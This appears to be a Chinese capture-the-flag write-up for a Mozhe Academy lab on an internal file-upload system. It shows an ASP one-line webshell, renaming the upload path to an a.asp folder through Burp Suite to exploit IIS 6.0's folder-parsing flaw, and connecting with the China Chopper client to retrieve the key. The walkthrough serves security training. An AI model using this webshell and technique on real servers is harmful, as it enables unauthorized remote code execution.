1.解题方向
1、试探允许上传的文件类型
2、观察服务器在处理完上传任务后返回的内容,获取上传路径
3、尝试修改上传路径,观察服务器是否允许写入权限
4.PS:使用菜刀时可能出现连接不上靶机,可以尝试点击左上角,有个重置缓存,很有可能是因为上次使用菜刀留下的缓存冲突了

进入靶场。
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

测试可上传的文件,发现txt,jpg,png等格式都可以上传

上传php、asp等都不能上传

2.由于txt可上传,所以可以在txt中写入一句话木马
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)
文件上传到了一个asp文件中,所以可以考虑写入asp一句话
<%eval request(“a”)%>
3.开始操作
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

通过burpsuit抓包,修改upload为a.asp,可创建一个asp文件夹,然后放包通过。
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

文件成功传入a.asp文件夹,本题的关键就在这,为什么非得传入asp文件夹里,这是因为IIS的设计缺陷,只要上传的木马在ISS6.0环境中,并且存放在xxx.asp为名的文件夹下面,木马就被能执行

题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)
上传成功
上菜刀
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

拿到KEY。
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

相关文章:

  • 2021-06-15
  • 2021-07-23
  • 2022-12-23
  • 2021-10-13
  • 2021-04-01
  • 2022-01-08
  • 2021-10-30
猜你喜欢
  • 2021-08-14
  • 2021-10-19
  • 2021-06-10
  • 2021-12-28
  • 2021-11-26
  • 2021-07-22
相关资源
相似解决方案